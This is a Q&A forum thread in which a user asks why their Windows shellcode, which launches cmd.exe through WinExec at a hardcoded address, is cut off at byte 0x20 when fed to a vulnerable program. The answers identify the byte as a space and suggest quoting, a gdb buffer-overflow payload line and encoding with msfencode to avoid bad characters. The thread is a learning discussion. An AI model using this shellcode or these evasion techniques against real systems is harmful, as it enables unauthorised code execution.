# shellcode is truncated by \x20

Tags: exploit, shellcode, winexe

Why is my shellcode is truncated after `\x20` opcode, when it is copied by string to stack on a second vulnerable program?

```
--cmd.exe--
 char shell[]=

"\xc7\x44\x24\x0c\x65\x78\x65\x20" ← only this line is put in stack, though hv a enough space 
"\xc7\x44\x24\x08\x63\x6d\x64\x2e"
"\x31\xc0"
"\x89\x44\x24\x04"
"\x8d\x44\x24\x08"
"\x89\x04\x24"
"\x8d\x05\xad\x23\x86\x7c"
"\xff\xd0";
--end shell--
```

Comment: If you can't answer that, you really should not be playing with it. :-)

Answer (score 2, accepted):

Are you passing this shellcode as a command-line argument?  In that case, take a look at the ASCII code for 0x20 ;)

Comment: Tks Raja to Aswer:])  So, I'm passing this by a function C of the kernel32.dll library  call WinExec()  and compiled by DEVC++ ..I'm try a Poc to my own deepening  knowledge...Does what's wrong?

Comment: Yep that would do it; the usual solution is to surround the command-line argument with quotes, but I'm not sure how the command-line parser would handle this case - after all, you're not meant to be passing around shell-code like this ;)

Answer (score 2):

Put a double quotations around the entire command.
For example, run:

```
"$shellcode" (gdb)r "$(python -c 'print "\x41" * 100 + "\x20\x83\x04\x08" + ....')"
```

Answer (score 1):

My theory is that things like quote, space, null, etc are being interpreted by the windows shell rather than being sent through. You could escape it somehow, but I think it's easier to just encode the shellcode. So try metasploit's msfencode utility to avoid those opcodes altogether. I know null (/x00), space (/x20) and quote (/x22) can't be passed directly, but I suppose that there are other opcodes that can't be passed as well.

That's my solution, but does anyone know of any other ones that are better?

Answer (score 0):

`\x20` like `<space>` in ASCII format